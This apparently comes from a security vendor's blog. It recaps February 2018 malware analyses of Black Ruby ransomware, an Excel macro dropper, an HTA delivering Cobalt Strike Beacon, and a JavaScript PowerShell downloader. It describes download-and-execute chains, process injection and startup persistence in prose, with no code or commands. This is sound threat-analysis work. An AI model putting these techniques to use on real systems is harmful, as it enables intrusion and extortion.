VMRay Malware Analysis Report Recap – February 2018

Welcome to the VMRay Malware Analysis Report Recap. Every month our Research Team provides a recap of the malware analysis reports posted to the VMRay Twitter account. This past February, our team analyzed Black Ruby ransomware, Cobalt Strike Beacon and a Javascript file attempting to detect VMs via the registry.

Click the links below to jump to a specific report:

Report Name: Black Ruby Ransomware

Date Released:

February 6, 2018



The Black Ruby ransomware was discovered in February 2018 by the MalwareHunterTeam.

For some malware authors, one attack type isn’t enough. Black Ruby includes a bonus cryptominer in addition to its standard ransomware capabilities. Not only does this malware encrypt the user’s files and demand a ransom but it also deploys a coin mining module to generate digital cryptocurrency.

Black Ruby’s capabilities are easy to identify from the function log (Figure 1).

Black Ruby Function Log- VMRay Malware Analysis Recap
Figure 1: VMRay Function log detailing Black Ruby’s behavior

Another observation is that Black Ruby will only encrypt a user’s machine if the user is not in Iran. The ransomware does this by checking the IP address using to determine the user’s location.

Black Ruby VTI - VMRay Malware Analysis Recap
Figure 2: Threat Indicators (VTI) associated with Black Ruby ransomware

To make matters worse, Black Ruby adds the cryptominer to the startup routine for persistence, as is indicated in the list of Threat Indicators (Figure 2).

Report Name: Excel File Drops Malicious Payload

Date Released:

February 13, 2018



This is a classic case of ‘VBA macro in a Microsoft Office document’. This malware sample downloads the payload via a macro script inside Excel and executes it.

The embedded VBA code can also be seen in the analysis report without the need for a separate local extraction.

VBA Code Embedded in Excel - VMRay Malware Analysis Report Recap
Figure 3: VBA code embedded in the Excel document submitted for analysis

In the VTI section of the analysis report, the VTI rule “Download File” reveals the malicious payload “val.exe” was downloaded and renamed to “heidi.exe” (Figure 4).

VTI Malicious Excel Document - VMRay Malware Analysis Recap
Figure 4: Threat Indicators (VTI) associated with the malicious Excel file

In addition, the Network tab indicates the contacted host is already blacklisted and is based in Malaysia (Figure 5)

Network Activity Excel Document - VMRay Malware Analysis Recap
Figure 5: Network activity involving Blacklisted hosts and URLs

Report Name: Cobalt Strike Beacon dropped by HTML Application (HTA)

Date Released:

February 15, 2018



HTML applications (HTA) are not often used as malware. In this case, the HTA file is used to download and execute a malicious payload.

The interesting part is the payload itself. It is a Javascript that injects and modifies the code of the “explorer.exe” process. The result is “explorer.exe” then injects and modifies the code of “rundll32.exe” to place a trojan into the system, as seen in the monitored processes in Figure 6.

Cobalt Strike Beacon Process Graph - Malware Analysis Recap
Figure 6: Process graph for Cobalt Strike Beacon
Cobalt Strike Beacon VTI - VMRay Malware Analysis Recap
Figure 7: Threat Indicators (VTI) associated with Cobalt Strike Beacon

Report Name: JavaScript Attempts to Detect VMs via Registry

Date Released:

February 28, 2018



This sample represents one of the most common techniques used by malware authors: writing a JavaScript file that downloads and executes a malicious payload. In this case, the JavaScript starts the command prompt and runs Powershell which then downloads and executes the payload. This can be seen clearly in the process graph included in the Overview section of the analysis report.

Process graph Javascript - VMRay Malware Analysis Recap
Figure 8: : Process graph associated with the malware behavior

Once downloaded, the malicious payload “roamingeox20.exe” is executed and is added to the startup routine.

VTI Score Malicious Javascript - VMRay Malware Analysis Recap
Figure 9: Threat indicators (VTI): Addition of the malicious payload to the system startup routine for persistence